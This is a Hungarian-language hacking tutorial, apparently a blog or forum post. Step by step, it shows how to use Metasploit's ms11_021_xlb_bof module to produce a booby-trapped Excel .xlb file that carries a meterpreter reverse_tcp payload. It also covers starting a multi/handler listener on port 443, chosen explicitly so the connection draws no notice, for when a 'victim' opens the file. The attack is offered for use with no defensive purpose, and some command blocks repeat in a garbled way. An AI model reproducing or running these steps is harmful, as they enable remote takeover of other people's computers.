Szóval először is ha nem lenne fenn akkor töltsük le a Microsoft Office 2007 vagy 2010-es csomagot és telepítsük fel. Az exploitot amit használni fogunk megtaláljuk a Metasploit-ban. Ezen keresztül generálunk egy xlb formátumú fájlt ami nem fog tartalmazni semmit csak egy payloadot amin keresztül be fogunk jutni a rendszerbe. Kezdjük is el! :) Nyissunk egy konzolt és indítsuk el a metasploitot. Ehhez be kell írni, hogy: msfconsole vagy msfpro.
És ha bejött a konzol írjuk be a következő parancsokat:
use windows/fileformat/ms11_021_xlb_bof
set payload windows/meterpreter/reverse_tcp
set lhost ip címed
set lport 443 (ide akármilyen számot írhatsz azért írtam 443-at, hogy ne legyen feltűnő)
exploit
Ezután a metasploit generál egy xlb fájlt ki is fogja írni, hogy hová tette és ezt kell majd megnyitni de mielőtt megnyitnánk a fájlt az áldozat gépen, még nyitnunk kell egy handlert ahova majd a payload csatlakozni tud:set payload windows/meterpreter/reverse_tcp
set lhost ip címed
set lport 443 (ide akármilyen számot írhatsz azért írtam 443-at, hogy ne legyen feltűnő)
exploit
back
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip címed
set lhost 443 (azt kell írni amit elsőnek megadtál)
exploit
Mikor az áldozat megnyitja az xlb fájlt akkor ilyesmit fog látni.:set payload windows/meterpreter/reverse_tcp
set lhost ip címed
set lhost 443 (azt kell írni amit elsőnek megadtál)
exploit
Ez után már azt csinálsz amit csak akarsz. :)
Ennyi lenne remélem érthető volt kösz, hogy elolvastad :)
